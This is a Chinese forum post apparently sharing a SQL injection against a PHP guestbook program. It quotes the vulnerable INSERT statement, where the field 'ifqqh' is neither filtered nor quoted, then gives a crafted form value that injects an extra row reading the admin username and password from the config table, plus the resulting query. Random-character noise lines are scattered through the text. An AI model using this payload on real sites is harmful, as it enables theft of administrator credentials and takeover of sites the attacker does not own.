留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。 J/ z/ b8 t2 K- y4 ~7 Z( k+ z
9 s& S; V4 C! g
$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。% }. b1 g7 V. b& a8 o8 F/ e
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
; A+ F9 o' R+ B* l% [, q, x% a2 e, X- \9 A h" E1 j
提交的时候把ifqqh的值改一下。变成
! U! U. Z1 T S6 B* O! I; W% H, B
( z( N: e5 j3 _" Y1 @3 k: [<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
2 l% b+ K8 o! I
( h% b1 n4 y' C& s7 f这样SQL插入语句就变了.
# p ?, e U% S2 }' @
1 P7 Z+ h }: P/ ^4 u, L7 ^insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)5 {: I G/ Z6 O
. O D: c4 ^* {! n4 F
构造了另外一句SQL。并且把帐号密码读出来。
+ W d+ J5 p# L3 ?" W; ~- l3 U1 C' p0 U: ]9 u
|
发表于 2013-2-19 08:10:11
收藏
支持
反对